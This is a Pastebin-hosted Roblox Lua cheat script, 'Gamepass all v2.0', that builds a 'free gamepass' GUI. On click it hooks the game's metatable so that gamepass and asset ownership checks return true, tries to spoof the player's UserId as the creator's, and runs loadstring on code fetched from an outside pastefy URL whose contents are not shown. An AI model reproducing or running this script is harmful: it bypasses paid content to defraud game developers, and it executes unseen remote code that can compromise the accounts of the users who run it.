Advertisement
A_GUES

Gamepass all v2.0 script

Jun 14th, 2023 (edited)
491
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 6.94 KB | None | 0 0
  1. local ScreenGui = Instance.new("ScreenGui")
  2. local Frame = Instance.new("Frame")
  3. local TextButton = Instance.new("TextButton")
  4. local TextButton_Roundify_12px = Instance.new("ImageLabel")
  5. local TextLabel = Instance.new("TextLabel")
  6. local TextLabel_2 = Instance.new("TextLabel")
  7. local TextButton_2 = Instance.new("TextButton")
  8.  
  9. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  10.  
  11. Frame.Parent = ScreenGui
  12. Frame.BackgroundColor3 = Color3.new(0, 0, 0)
  13. Frame.BorderSizePixel = 0
  14. Frame.Position = UDim2.new(0.380307138, 0, 0.356790125, 0)
  15. Frame.Size = UDim2.new(0, 264, 0, 232)
  16.  
  17. TextButton.Parent = Frame
  18. TextButton.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
  19. TextButton.BackgroundTransparency = 1
  20. TextButton.BorderSizePixel = 0
  21. TextButton.Position = UDim2.new(0.075757578, 0, 0.238093197, 0)
  22. TextButton.Size = UDim2.new(0, 223, 0, 61)
  23. TextButton.ZIndex = 10
  24. TextButton.Font = Enum.Font.SourceSansBold
  25. TextButton.Text = "Click to get free gamepasses!"
  26. TextButton.TextColor3 = Color3.new(1, 0, 0.0156863)
  27. TextButton.TextScaled = true
  28. TextButton.TextSize = 14
  29. TextButton.TextWrapped = true
  30.  
  31. TextButton_Roundify_12px.Name = "TextButton_Roundify_12px"
  32. TextButton_Roundify_12px.Parent = TextButton
  33. TextButton_Roundify_12px.Active = true
  34. TextButton_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5)
  35. TextButton_Roundify_12px.BackgroundColor3 = Color3.new(1, 1, 1)
  36. TextButton_Roundify_12px.BackgroundTransparency = 1
  37. TextButton_Roundify_12px.Position = UDim2.new(0.493303567, 0, 0.5, 0)
  38. TextButton_Roundify_12px.Selectable = true
  39. TextButton_Roundify_12px.Size = UDim2.new(1.07589281, 0, 0.99999994, 0)
  40. TextButton_Roundify_12px.ZIndex = 2
  41. TextButton_Roundify_12px.Image = "rbxassetid://3570695787"
  42. TextButton_Roundify_12px.ImageColor3 = Color3.new(0.886275, 0.886275, 0.886275)
  43. TextButton_Roundify_12px.ScaleType = Enum.ScaleType.Slice
  44. TextButton_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100)
  45.  
  46. TextLabel.Parent = Frame
  47. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  48. TextLabel.BackgroundTransparency = 1
  49. TextLabel.BorderSizePixel = 0
  50. TextLabel.Position = UDim2.new(0.0265151523, 0, 0.5661062, 0)
  51. TextLabel.Size = UDim2.new(0, 249, 0, 63)
  52. TextLabel.ZIndex = 5
  53. TextLabel.Font = Enum.Font.Arcade
  54. TextLabel.Text = "Made by YouTube : darkModz"
  55. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  56. TextLabel.TextScaled = true
  57. TextLabel.TextSize = 14
  58. TextLabel.TextWrapped = true
  59.  
  60. TextLabel_2.Parent = Frame
  61. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  62. TextLabel_2.BackgroundTransparency = 1
  63. TextLabel_2.BorderSizePixel = 0
  64. TextLabel_2.Position = UDim2.new(7.4505806e-09, 0, -0.0344827585, 0)
  65. TextLabel_2.Size = UDim2.new(0, 264, 0, 63)
  66. TextLabel_2.ZIndex = 6
  67. TextLabel_2.Font = Enum.Font.Creepster
  68. TextLabel_2.Text = "FREE GAMEPASS GUI"
  69. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  70. TextLabel_2.TextScaled = true
  71. TextLabel_2.TextSize = 14
  72. TextLabel_2.TextWrapped = true
  73.  
  74. TextButton_2.Parent = Frame
  75. TextButton_2.BackgroundColor3 = Color3.new(1, 1, 1)
  76. TextButton_2.BorderSizePixel = 0
  77. TextButton_2.Position = UDim2.new(0.223484844, 0, 0.887931049, 0)
  78. TextButton_2.Size = UDim2.new(0, 146, 0, 26)
  79. TextButton_2.Font = Enum.Font.SourceSans
  80. TextButton_2.Text = "Close GUI"
  81. TextButton_2.TextColor3 = Color3.new(0, 0, 0)
  82. TextButton_2.TextScaled = true
  83. TextButton_2.TextSize = 14
  84. TextButton_2.TextWrapped = true
  85.  
  86. -- Scripts
  87.  
  88. local function GAVYODK_fake_script() -- TextButton.LocalScript
  89.     local script = Instance.new('LocalScript', TextButton)
  90.  
  91.     function onclick()
  92.         print("yes!!")
  93.         if game.CreatorType == Enum.CreatorType.User then
  94.             game.Players.LocalPlayer.UserId = game.CreatorId
  95.         end
  96.         if game.CreatorType == Enum.CreatorType.Group then
  97.             game.Players.LocalPlayer.UserId = game:GetService("GroupService"):GetGroupInfoAsync(game.CreatorId).Owner.Id
  98.         end
  99.         wait()
  100.         local mt = getrawmetatable(game)
  101.         local old = mt.__namecall
  102.         setreadonly(mt, false)
  103.         mt.__namecall = newcclosure(function(self, ...)
  104.             local method = getnamecallmethod()
  105.             if method == 'UserOwnsGamePassAsync' or method == 'PlayerHasPass' or method == 'PlayerOwnsAsset' then
  106.                 return true
  107.             end
  108.             return old(self, ...)
  109.         end)
  110.         setreadonly(mt, true)
  111.         wait(0.5)
  112.         game.Players.LocalPlayer.Character.Humanoid.Health = 0
  113.  
  114.         repeat wait() until game.Players.LocalPlayer.Character.Humanoid.Health ~= 0
  115.         loadstring(game:HttpGet(('https://pastefy.ga/VYIAk3o1/raw'),true))()
  116.  
  117.         game.StarterGui:SetCore("SendNotification", {
  118.             Title = "darkModz";
  119.             Text = "Attempted to get free gamepasses and universal tools!";
  120.             Icon = "rbxassetid://57254792";
  121.             Duration = 5;
  122.         })
  123.     end
  124.  
  125.     script.Parent.MouseButton1Click:connect(onclick)
  126. end
  127. coroutine.wrap(GAVYODK_fake_script)()
  128. local function BYKIYL_fake_script() -- TextLabel_2.LocalScript
  129.     local script = Instance.new('Script', TextLabel_2)
  130.  
  131.     local text = script.Parent
  132.     local add = 10
  133.     wait(1)
  134.     local k = 1
  135.     while k <= 255 do
  136.         text.TextColor3 = Color3.new(k/255,0/255,0/255)
  137.         k = k + add
  138.         wait()
  139.     end
  140.     while true do
  141.         k = 1
  142.         while k <= 255 do
  143.             text.TextColor3 = Color3.new(255/255,k/255,0/255)
  144.             k = k + add
  145.             wait()
  146.         end
  147.         k = 1
  148.         while k <= 255 do
  149.             text.TextColor3 = Color3.new(255/255 - k/255,255/255,0/255)
  150.             k = k + add
  151.             wait()
  152.         end
  153.         k = 1
  154.         while k <= 255 do
  155.             text.TextColor3 = Color3.new(0/255,255/255,k/255)
  156.             k = k + add
  157.             wait()
  158.         end
  159.         k = 1
  160.         while k <= 255 do
  161.             text.TextColor3 = Color3.new(0/255,255/255 - k/255,255/255)
  162.             k = k + add
  163.             wait()
  164.         end
  165.         k = 1
  166.         while k <= 255 do
  167.             text.TextColor3 = Color3.new(k/255,0/255,255/255)
  168.             k = k + add
  169.             wait()
  170.         end
  171.         k = 1
  172.         while k <= 255 do
  173.             text.TextColor3 = Color3.new(255/255,0/255,255/255 - k/255)
  174.             k = k + add
  175.             wait()
  176.         end
  177.         while k <= 255 do
  178.             text.TextColor3 = Color3.new(255/255 - k/255,0/255,0/255)
  179.             k = k + add
  180.             wait()
  181.         end
  182.     end
  183. end
  184. coroutine.wrap(BYKIYL_fake_script)()
  185. local function SOIYI_fake_script() -- Frame.LocalScript
  186.     local script = Instance.new('LocalScript', Frame)
  187.  
  188.     script.Parent.Active = true
  189.     script.Parent.Draggable = true
  190. end
  191. coroutine.wrap(SOIYI_fake_script)()
  192. local function TCHPMMP_fake_script() -- TextButton_2.LocalScript
  193.     local script = Instance.new('LocalScript', TextButton_2)
  194.  
  195.     function onclick()
  196.         script.Parent.Parent:Destroy()
  197.     end
  198.  
  199.     script.Parent.MouseButton1Click:connect(onclick)
  200. end
  201. coroutine.wrap(TCHPMMP_fake_script)()
  202.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement